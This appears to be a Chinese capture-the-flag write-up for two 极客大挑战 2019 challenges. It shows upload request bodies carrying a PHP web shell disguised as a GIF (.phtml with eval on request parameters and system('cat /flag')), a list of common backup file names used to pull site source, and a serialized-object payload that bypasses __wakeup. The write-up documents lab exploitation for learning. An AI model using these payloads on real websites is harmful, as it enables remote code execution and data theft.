[极客大挑战 2019]Upload
1
2
3
4
5
6
| Content-Disposition: form-data; name="file"; filename="php.phtml"
Content-Type: image/jpeg
GIF89a
<script language='php'>eval($_GET["z"]);</script>
|
显示上传成功,但是没找到目录在哪
在url试了一下
在这个目录
试了好久发现马没生效
上网找了一个文件头
1
2
3
4
5
6
| Content-Disposition: form-data; name="file"; filename="text.phtml"
Content-Type: image/jpeg
GIF89a
<script language='php'>@eval($_POST[shell]);</script>
<script language='php'>system('cat /flag');</script>
|
from:https://blog.csdn.net/m0_55793759/article/details/120956861
成功
[极客大挑战 2019]PHP
网址备份没思路,便上网查:
https://blog.csdn.net/m0_62879498/article/details/124129841
1
2
3
4
5
6
7
8
9
10
| 常见的网站源码备份文件后缀:
tar.gz,zip,rar,tar
常见的网站源码备份文件名:
web,website,backup,back,www,wwwroot,temp
后用
www.zip下载备份源码
|
里面有个flag.php
1
2
3
| <?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
|
假flag,,,
审计index.php,
好像是反序列化?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| <!DOCTYPE html>
<head>
<meta charset="UTF-8">
<title>I have a cat!</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="style.css">
</head>
<style>
position: absolute;
top: 50%;
left:50%;
margin: -150px 0 0 -150px;
width: 300px;
height: 300px;
}
h4{
font-size: 2em;
margin: 0.67em 0;
}
</style>
<body>
<div id="world">
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
</div>
<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script src="index.js"></script>
</body>
</html>
|
select->name,
好像要先查看admin密码
1
2
3
4
5
6
7
8
| $a=new name('admin','100');
return:
NO!!!hacker!!!
You name is: nonono
You password is: yesyes
$a=new name('guest','100');
|
再仔细看了一下,应该是要绕过wakeup函数里的赋值,不然就没法让username=admin,
上网差了一下,发现以前我好像做过wakeup绕过的题,那就是修改元素个数,
还是绕不过,去找wp,最后发现是有private,要用url加密,不然的话会有些不可显示字符的缺漏导致错误
未url加密:
1
| O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
|
可以看到Nameusername,和Namepassowrd,这两元素是因为少了字符导致连起来了,编码后可以看到
1
| O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
|
正确的样式应该是: %00Name%00username , %00Name%00password
记得要把2改为3,找的有点眼花,也可以像wp那样传:
1
| O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
|
参考:
https://blog.csdn.net/m0_62879498/article/details/124129841
https://aidemofashi.github.io/2025/03/19/note-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-01/